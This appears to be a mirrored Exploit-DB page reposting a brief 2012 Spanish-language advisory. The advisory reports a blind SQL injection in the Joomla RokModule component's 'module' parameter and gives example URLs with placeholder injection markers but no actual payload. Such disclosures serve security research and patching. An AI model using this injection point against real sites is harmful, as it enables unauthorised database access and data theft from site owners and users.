Joomla! Component RokModule 1.1 – ‘module’ Blind SQL Injection

• Exploit Database
• 108 阅读

• 作者： Yarolinux
  日期： 2012-09-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/21221/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

  Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability   Nombre del Componente: Com_rokmodule   Empresa: http://www.rockettheme.com/   Testeado: Linux Backtrack   Autor: Yarolinux Para WebSecurityDev Twitter: @Yarolinux   Fecha: 09/09/2012   Bueno la Injeccion Va de la siguiente manera:   http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]   http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]     Ok! Eso es todo Difrutenlo!   Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy pronto resultados :D   Greetz: Dylan Irzi & WebSecurityDev